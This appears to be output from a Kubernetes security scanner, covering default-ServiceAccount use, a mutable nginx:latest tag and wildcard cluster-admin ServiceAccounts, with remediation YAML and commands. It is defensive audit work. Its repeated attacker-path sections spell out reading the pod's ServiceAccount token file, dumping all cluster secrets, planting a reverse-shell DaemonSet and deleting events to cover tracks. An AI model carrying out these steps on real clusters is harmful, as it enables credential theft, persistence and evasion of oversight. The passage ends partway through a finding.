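kind: RoleBinding
metadata:
  name: api-sa-binding
  namespace: flat-network
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: api-sa-role
subjects:
  - kind: ServiceAccount
    name: api-sa
    namespace: flat-network
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: default
  namespace: flat-network
automountServiceAccountToken: false         # step 3: stop auto-mounting the default SA token

In the Deployment's pod template, set serviceAccountName: api-sa (and automountServiceAccountToken: false if the app never talks to the API at all).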
Evidence
ServiceAccount: default
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/flat-network/unmatched Workload 5.4
Workload Deployment/flat-network/unmatched runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/flat-network/unmatched
Category: Privilege Escalation Resource: Deployment/flat-network/unmatched Namespace: flat-network

Workload Deployment/flat-network/unmatched does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n flat-network create sa unmatched-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: unmatched-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n flat-network -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n flat-network -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccount: default
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/ingress-only/ingress-app Workload 5.4
Workload Deployment/ingress-only/ingress-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/ingress-only/ingress-app
Category: Privilege Escalation Resource: Deployment/ingress-only/ingress-app Namespace: ingress-only

Workload Deployment/ingress-only/ingress-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n ingress-only create sa ingress-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: ingress-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n ingress-only -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n ingress-only -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccount: default
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/psa-suppressed/psa-priv-app Workload 5.4
Workload Deployment/psa-suppressed/psa-priv-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/psa-suppressed/psa-priv-app
Category: Privilege Escalation Resource: Deployment/psa-suppressed/psa-priv-app Namespace: psa-suppressed

Workload Deployment/psa-suppressed/psa-priv-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n psa-suppressed create sa psa-priv-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: psa-priv-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n psa-suppressed -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n psa-suppressed -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccount: default
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/generic-hostpath-app Workload 5.4
Workload Deployment/vulnerable/generic-hostpath-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/generic-hostpath-app
Category: Privilege Escalation Resource: Deployment/vulnerable/generic-hostpath-app Namespace: vulnerable

Workload Deployment/vulnerable/generic-hostpath-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa generic-hostpath-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: generic-hostpath-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccount: default
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/host-ns-app Workload 5.4
Workload Deployment/vulnerable/host-ns-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/host-ns-app
Category: Privilege Escalation Resource: Deployment/vulnerable/host-ns-app Namespace: vulnerable

Workload Deployment/vulnerable/host-ns-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa host-ns-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: host-ns-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccount: default
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/risky-app Workload 5.4
Workload Deployment/vulnerable/risky-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Privilege Escalation Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Workload Deployment/vulnerable/risky-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa risky-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: risky-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccount: default
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/root-runner Workload 5.4
Workload Deployment/vulnerable/root-runner runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/root-runner
Category: Privilege Escalation Resource: Deployment/vulnerable/root-runner Namespace: vulnerable

Workload Deployment/vulnerable/root-runner does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa root-runner-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: root-runner-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccount: default
Show raw JSON
{
  "service_account": "default"
}
MEDIUM Deployment/vulnerable/socket-mounts-app Workload 5.4
Workload Deployment/vulnerable/socket-mounts-app runs as the namespace default ServiceAccount
Scope · Workload Workload Deployment/vulnerable/socket-mounts-app
Category: Privilege Escalation Resource: Deployment/vulnerable/socket-mounts-app Namespace: vulnerable

Workload Deployment/vulnerable/socket-mounts-app does not specify serviceAccountName and therefore runs as the namespace's default ServiceAccount, which by default has its token auto-mounted at /var/run/secrets/kubernetes.io/serviceaccount/token.

The default SA is harmless in a fresh namespace, but it is a magnet for permission accumulation: operators, Helm charts, and ClusterRoleBindings frequently bind permissions to it (often by mistake, via subjects: [{kind: ServiceAccount, name: default, namespace: foo}]), and the only way to know if the SA is dangerous is to enumerate every binding referencing it.

The Kubernetes RBAC Good Practices guide explicitly recommends per-workload ServiceAccounts so that the blast radius of an exposed token is bounded by a single workload's needs. An attacker with RCE in this pod reads the token, then runs kubectl auth can-i --list to find every accreted permission, often elevated by drift over the namespace's lifetime.

Impact Token theft yields whatever permissions the namespace default SA has been granted (often elevated by drift); enables lateral movement to other workloads in the namespace.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. RCE in the pod.
  2. Read the SA token: cat /var/run/secrets/kubernetes.io/serviceaccount/token.
  3. Enumerate permissions: kubectl --token=$TOKEN auth can-i --list.
  4. Exploit any usable verb. Common findings: secrets/get (loot all secrets), pods/exec (shell into other pods), pods/create with privileged template (escalate to node).
  5. Persist by creating a hidden Deployment with the same compromised SA.
Remediation
Create a dedicated ServiceAccount per workload with least-privilege RBAC; disable automount on the namespace default SA.
  1. Create a ServiceAccount: kubectl -n vulnerable create sa socket-mounts-app-sa. Grant only the verbs/resources the app actually needs via a Role + RoleBinding.
  2. Reference the new SA in the PodSpec via serviceAccountName: socket-mounts-app-sa. If the app does NOT need to talk to the API at all, also set automountServiceAccountToken: false.
  3. Disable automount on the namespace default SA: kubectl patch sa default -n vulnerable -p '{"automountServiceAccountToken": false}'.
  4. Validate: kubectl get pod -n vulnerable -l <selector> -o jsonpath='{.items[*].spec.serviceAccountName}' returns the new SA, not default.
Evidence
ServiceAccount: default
Show raw JSON
{
  "service_account": "default"
}
LOW

Container app uses mutable image tag nginx:latest in Deployment/vulnerable/risky-app

KUBE-IMAGE-LATEST-001 1 subject Score 2.5
MITRE ATT&CK: T1525 · T1195.002 · T1554

Affected subject

LOW Deployment/vulnerable/risky-app Workload 2.5
Container app uses mutable image tag nginx:latest in Deployment/vulnerable/risky-app
Scope · Workload Workload Deployment/vulnerable/risky-app
Category: Defense Evasion Resource: Deployment/vulnerable/risky-app Namespace: vulnerable

Container app in Deployment/vulnerable/risky-app references the image nginx:latest using a mutable tag (either :latest or no tag, which Kubernetes resolves to :latest). Mutable tags break two safety properties: (1) the same manifest produces non-deterministic deployments, since the tag may resolve to different content on different days; (2) there is no cryptographic binding between the manifest and the image content actually run, so registry-side or in-flight tampering cannot be detected.

This is a defense-evasion / supply-chain hygiene finding rather than an active exploit. Image digests (@sha256:<hex>) are immutable: the digest is computed over the manifest content, so any change yields a different digest. SLSA, Sigstore Cosign, and admission controllers like Kyverno or Connaisseur are the modern controls; pinning to a digest is the prerequisite for verifying signatures.

A public package compromise (Codecov-style or PyPI-typosquat scenarios, or the 2024 ultralytics PyPI compromise) can republish image:latest with malicious code; clusters with imagePullPolicy: Always and :latest silently pick it up. Pinning to a digest turns a silent supply-chain attack into a noisy CI failure.

Impact Non-deterministic deployments and silent ingestion of upstream supply-chain compromises; disables digest-based verification and signature checking.
How an attacker abuses this
Background
Resource: Deployment

A Deployment manages a ReplicaSet which manages Pods. The dangerous attribute lives on the pod template: every replica inherits the same ServiceAccount, the same securityContext, and the same volume mounts. A risky pod template multiplies into N risky pods.

Kubernetes docs ↗
  1. Attacker compromises an upstream image (registry credential leak, typosquat, or maintainer takeover).
  2. Pushes vendor/app:latest with a malicious additional layer.
  3. Target cluster's pod restarts and imagePullPolicy: Always re-pulls the tag, getting the new digest silently.
  4. Malicious code runs under the workload's existing RBAC/secrets context.
  5. Without digest pinning or signature verification, defenders have no signal until detection-tier tools fire on the malicious behavior.
Remediation
Pin every image to an immutable digest (@sha256:...) and verify signatures at admission.
  1. Resolve the digest: crane digest <ref> or docker buildx imagetools inspect <image>:<tag>. Update manifests to image: <repo>@sha256:<digest> (you may keep the tag for documentation: image: <repo>:1.2.3@sha256:<digest>).
  2. Set imagePullPolicy: IfNotPresent (digest pinning makes Always unnecessary). For images that genuinely must float, require at least a versioned tag and enforce it with a Kyverno policy that rejects :latest.
  3. Sign images at build time with Sigstore Cosign and enforce verification at admission with Connaisseur, Kyverno's verifyImages rule, or sigstore-policy-controller.
  4. Validate: kubectl get deployment/risky-app -n vulnerable -o jsonpath='{.spec.template.spec.containers[*].image}' contains @sha256:.
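For example, the pinned form from step 1 might look like the sketch below; the version tag and digest are placeholders to resolve with crane digest or docker buildx imagetools inspect before committing.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: risky-app
  namespace: vulnerable
spec:
  selector:
    matchLabels:
      app: risky-app                         # illustrative labels
  template:
    metadata:
      labels:
        app: risky-app
    spec:
      containers:
        - name: app
          # Tag kept for readability; the digest is what the runtime actually pulls.
          image: nginx:<pinned-version>@sha256:<digest>   # placeholder tag and digest
          imagePullPolicy: IfNotPresent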
Evidence
Container: app
Image: nginx:latest
:latest is mutable: the same tag can resolve to different images over time
Show raw JSON
{
  "container": "app",
  "image": "nginx:latest"
}

Service Accounts

8 findings · 4 rules · 4 critical · 3 high · 1 medium · 0 low
CRITICAL

ServiceAccount ServiceAccount/rbac-fixtures/sa-cluster-admin holds wildcard verbs on wildcard resources (cluster-admin equivalent)

KUBE-SA-PRIVILEGED-001 2 subjects Score 10.0
MITRE ATT&CK: T1078.004 · T1098.004 · T1068

Affected subjects (2)

CRITICAL ServiceAccount/rbac-fixtures/sa-cluster-admin Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-cluster-admin holds wildcard verbs on wildcard resources (cluster-admin equivalent)
Scope · Namespace ServiceAccount rbac-fixtures/sa-cluster-admin: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-cluster-admin Resource: ServiceAccount/rbac-fixtures/sa-cluster-admin

ServiceAccount ServiceAccount/rbac-fixtures/sa-cluster-admin is bound to a Role/ClusterRole that grants verbs: [*] on resources: [*] (and typically apiGroups: [*]). This is structurally indistinguishable from cluster-admin. Every API operation on every resource is authorized.

Aggregated rules:
- verbs [*] on resources [*] (from crb-cluster-admin/cluster-admin in cluster-wide)
- verbs [*] with no resource types listed (cluster-admin's non-resource-URL rule, from crb-cluster-admin/cluster-admin in cluster-wide)

Wildcard-on-wildcard bindings are almost never the right design. They are typically the result of: (a) copy-pasting cluster-admin for an operator the team didn't have time to scope down; (b) a wildcard added "temporarily" during integration that never got rotated; (c) a third-party operator's installer that ships with */* and assumes the operator runs in a dedicated cluster. None of those reasons survive a security review, but the binding survives because there is no concrete reason to break it. CIS Kubernetes 5.1.1 / 5.1.2 explicitly call out wildcard-on-wildcard as a finding.

Workloads using this SA: no workloads currently mount this SA, so today's exposure rests on the token itself leaking (a backup, CI logs, a checked-in kubeconfig). The moment any workload is assigned this SA, a single compromise of it (one CVE, one poisoned container image) becomes full cluster compromise immediately. There is no defense-in-depth left.

Impact A single compromise of any pod mounting this SA grants full cluster control: read every Secret, exec into any pod, mutate RBAC, drain nodes, taint scheduling, install backdoor DaemonSets. Every API operation succeeds.
How an attacker abuses this
Background
Subject: ServiceAccount

A ServiceAccount is an in-cluster identity assigned to pods. Every pod gets a token mounted at /var/run/secrets/kubernetes.io/serviceaccount/token, and that token is the credential. If an attacker reads that file from inside a compromised container (or creates a pod that mounts the token), they can call the API as the ServiceAccount, with whatever permissions the SA has been granted.

This is the most common pivot in real-world Kubernetes attacks: compromise one pod, steal its token, ride the token to wherever its RBAC allows.

Kubernetes docs ↗
  1. Attacker compromises any of the workloads using ServiceAccount/rbac-fixtures/sa-cluster-admin (or finds the token in any storage that touched it: backup, CI logs, a developer's kubeconfig).
  2. They kubectl auth can-i '*' '*' --all-namespaces --token=<stolen-token> and confirm full reach.
  3. They kubectl get secrets -A -o yaml to harvest all credentials cluster-wide (cloud IAM keys, registry pull secrets, application DB passwords, third-party SaaS API keys).
  4. They install a persistent foothold: a DaemonSet using a benign-looking image that runs an attacker reverse-shell on every node, plus a malicious mutating webhook with failurePolicy: Ignore, so the webhook fails open if its backend is ever torn down and the configuration lingers unnoticed.
  5. They cover their tracks by deleting cluster Event objects via kubectl delete events (allowed under */*) and rotating the SA's token to invalidate any copies incident responders already hold.
Remediation
Replace the wildcard binding on ServiceAccount/rbac-fixtures/sa-cluster-admin with the smallest concrete role that satisfies the workload's actual needs. Treat the existing token as compromised.
  1. Identify the binding: kubectl get rolebindings,clusterrolebindings -A -o json | jq '.items[] | select(.subjects[]? | .kind == "ServiceAccount" and .name == "sa-cluster-admin" and .namespace == "rbac-fixtures")'.
  2. Generate a least-privilege role from the workload's actual API calls. Capture them with audit2rbac (https://github.com/liggitt/audit2rbac) over a representative window, or read the operator's source for the API verbs it issues.
  3. Create a Role/ClusterRole with the minimum verbs and bind it to ServiceAccount/rbac-fixtures/sa-cluster-admin (see the sketch after this list). Verify with kubectl auth can-i for the actual operations the workload needs (and only those).
  4. Delete the wildcard binding and rotate the SA's token (delete and recreate the SA, or rely on projected SA token TTL). Audit-log review for the SA over the last 30 days to gauge possible misuse.
  5. Wire enforcement: a Kyverno cluster policy that fails any RoleBinding/ClusterRoleBinding granting verbs: ['*'] on resources: ['*'] to a non-system subject.
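A sketch of the step 3 replacement, assuming audit2rbac showed the workload only reads ConfigMaps and Pods in its own namespace; the verbs and resources are placeholders, so substitute whatever the audit actually observed.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: sa-cluster-admin-scoped        # hypothetical role name
  namespace: rbac-fixtures
rules:
  - apiGroups: [""]
    resources: ["configmaps", "pods"]  # placeholder: use the resources audit2rbac observed
    verbs: ["get", "list", "watch"]    # placeholder: use the verbs audit2rbac observed
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: sa-cluster-admin-scoped
  namespace: rbac-fixtures
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: sa-cluster-admin-scoped
subjects:
  - kind: ServiceAccount
    name: sa-cluster-admin
    namespace: rbac-fixtures
Once kubectl auth can-i confirms the workload's operations still succeed under this role, delete crb-cluster-admin and rotate the token as described in step 4.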
Evidence
Effective rules
* on *
via cluster-admin (binding crb-cluster-admin) (cluster scope)
* on
via cluster-admin (binding crb-cluster-admin) (cluster scope)
Show raw JSON
{
  "rules": [
    {
      "namespace": "",
      "resources": [
        "*"
      ],
      "source_binding": "crb-cluster-admin",
      "source_role": "cluster-admin",
      "verbs": [
        "*"
      ]
    },
    {
      "namespace": "",
      "resources": null,
      "source_binding": "crb-cluster-admin",
      "source_role": "cluster-admin",
      "verbs": [
        "*"
      ]
    }
  ],
  "workloads": null
}
CRITICAL ServiceAccount/rbac-fixtures/sa-wildcard Namespace 10.0
ServiceAccount ServiceAccount/rbac-fixtures/sa-wildcard holds wildcard verbs on wildcard resources (cluster-admin equivalent)
Scope · Namespace ServiceAccount rbac-fixtures/sa-wildcard: namespace-scoped subject; mounted by pods in rbac-fixtures
Category: Privilege Escalation Subject: ServiceAccount/rbac-fixtures/sa-wildcard Resource: ServiceAccount/rbac-fixtures/sa-wildcard

ServiceAccount ServiceAccount/rbac-fixtures/sa-wildcard is bound to a Role/ClusterRole that grants verbs: [*] on resources: [*] (and typically apiGroups: [*]). This is structurally indistinguishable from cluster-admin. Every API operation on every resource is authorized.

Aggregated rules:
- verbs [*] on resources [*] (from crb-wildcard/cr-wildcard in cluster-wide)

Wildcard-on-wildcard bindings are almost never the right design. They are typically the result of: (a) copy-pasting cluster-admin for an operator the team didn't have time to scope down; (b) a wildcard added "temporarily" during integration that never got rotated; (c) a third-party operator's installer that ships with */* and assumes the operator runs in a dedicated cluster. None of those reasons survive a security review, but the binding survives because there is no concrete reason to break it. CIS Kubernetes 5.1.1 / 5.1.2 explicitly call out wildcard-on-wildcard as a finding.

Workloads using this SA: Pod/rbac-fixtures/wildcard-app-85ff74597d-pr7l6, Deployment/rbac-fixtures/wildcard-app. Any compromise of any of those workloads (a single CVE, a poisoned container image, a leaked configuration file containing the SA token) becomes full cluster compromise immediately. There is no defense-in-depth left.

Impact A single compromise of any pod mounting this SA grants full cluster control: read every Secret, exec into any pod, mutate RBAC, drain nodes, taint scheduling, install backdoor DaemonSets. Every API operation succeeds.
How an attacker abuses this
Background
Subject: ServiceAccount

